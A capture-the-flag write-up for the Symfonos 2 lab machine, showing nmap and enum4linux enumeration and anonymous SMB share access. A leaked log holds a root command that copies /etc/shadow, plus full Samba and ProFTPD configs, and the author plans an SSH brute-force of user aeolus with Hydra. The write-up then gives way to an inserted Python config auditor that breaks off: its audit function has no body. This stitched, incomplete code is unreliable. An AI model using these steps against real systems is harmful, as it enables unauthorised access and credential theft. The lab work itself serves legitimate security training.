# Symfonos 2

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/sym2 192.168.43.97
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 10:27 EDT
Nmap scan report for symfonos2 (192.168.43.97)
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1  Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:03:48:23 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2020-05-15T09:27:31-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T14:27:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds
```

### Enum4linux

```
enum4linux -a 192.168.43.97
```

```
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 11:08:47 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.43.97
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.43.97    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.43.97    |
 ============================================= 
Looking up status of 192.168.43.97
        SYMFONOS2       <00> -         B <ACTIVE>  Workstation Service
        SYMFONOS2       <03> -         B <ACTIVE>  Messenger Service
        SYMFONOS2       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.43.97    |
 ====================================== 
[+] Server 192.168.43.97 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.43.97    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.43.97    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.97 from smbclient: 
[+] Got OS info for 192.168.43.97 from srvinfo:
        SYMFONOS2      Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 192.168.43.97    |
 ============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================== 
|    Share Enumeration on 192.168.43.97    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS2

[+] Attempting to map shares on 192.168.43.97
//192.168.43.97/print$  Mapping: DENIED, Listing: N/A
//192.168.43.97/anonymous       Mapping: OK, Listing: OK
//192.168.43.97/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.43.97    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 192.168.43.97 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 192.168.43.97    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.43.97 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-629329663-2933547119-2337616968
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-629329663-2933547119-2337616968 and logon username '', password ''
S-1-5-21-629329663-2933547119-2337616968-500 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-501 SYMFONOS2\nobody (Local User)
S-1-5-21-629329663-2933547119-2337616968-502 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-503 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-504 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-505 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-506 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-507 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-508 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-509 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-510 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-511 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-512 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-513 SYMFONOS2\None (Domain Group)
S-1-5-21-629329663-2933547119-2337616968-514 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-515 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-516 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-517 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-518 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-519 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-520 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-521 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-522 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-523 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-524 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-525 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-526 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-527 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-528 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-529 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-530 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-531 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-532 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-533 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-534 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-535 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-536 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-537 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-538 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-539 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-540 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-541 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-542 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-543 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-544 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-545 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-546 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-547 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-548 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-549 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-550 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1000 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1001 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1002 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1003 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1004 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1005 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1006 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1007 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1008 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1009 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1010 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1011 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1012 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1013 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1014 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1015 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1016 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1017 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1018 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1019 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1020 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1021 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1022 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1023 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1024 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1025 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1026 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1027 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1028 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1029 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1030 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1031 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1032 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1033 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1034 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1035 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1036 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1037 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1038 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1039 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1040 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1041 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1042 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1043 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1044 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1045 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1046 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1047 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1048 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1049 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1050 *unknown*\*unknown* (8)

 ============================================== 
|    Getting printer info for 192.168.43.97    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 15 11:09:08 2020

```

We can see the `anonymous` shared folder here:

![](/files/-M7OGXL092f8zC8PWlyP)

We can then use smbclient to see what's inside.

### smbclient

```
smbclient //192.168.43.97/anonymous
```

We can then run `ls` to list the files available in the anonymous share. We saw a `backup` folder, so change directory into it and download `log.txt` by typing `get log.txt`.

![](/files/-M7OH92On_teF2p2vXMM)

This is the content of `log.txt`:

```
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

[homes]
   comment = Home Directories
   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes

root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

# Port 21 is the standard FTP port.
Port                            21

# Don't use IPv6 support by default.
UseIPv6                         off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances                    30

# Set the user and group under which the server will run.
User                            aeolus
Group                           aeolus

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite          on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User                          ftp
  Group                         ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias                     anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients                    10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  #DisplayLogin                 welcome.msg
  #DisplayChdir                 .message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>

```

![](/files/-M7OIJHiN4td0BhhqiRy)

As we can see here, we have a user called `aeolus`, so maybe we can brute-force the SSH login using Hydra.
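The leaked `smb.conf` shows why the share was reachable without credentials. As an added example (not part of the original write-up), this Python audit parses an excerpt of that config and flags the guest-access settings. The finding codes and the hardened variant (`valid users = aeolus`) are assumptions made for illustration.

```python
import re

# Excerpt of the smb.conf captured in log.txt above; comment lines trimmed.
LEAKED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = bad user
   usershare allow guests = yes

[homes]
   comment = Home Directories
   browseable = no
   read only = yes
   valid users = %S

[print$]
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no

;[profiles]
;   guest ok = no

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes
"""

# Constructed "after" variant: guest mapping off, share limited to one user.
HARDENED_SMB_CONF = (
    LEAKED_SMB_CONF
    .replace("map to guest = bad user", "map to guest = never")
    .replace("guest ok = yes", "guest ok = no\n   valid users = aeolus")
)

TRUE = {"yes", "true", "on", "1"}


def parse_smb_conf(text):
    """Return {section: {key: value}}. Samba ignores case and whitespace in
    parameter names, so keys are normalised ('guest ok' -> 'guestok')."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank line or comment
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1).strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current[re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def flag(opts, *names, default="no"):
    """Boolean lookup across synonymous parameter names."""
    for name in names:
        if name in opts:
            return opts[name].strip().lower() in TRUE
    return default in TRUE


def audit(text):
    """Return a list of (section, finding_code) tuples."""
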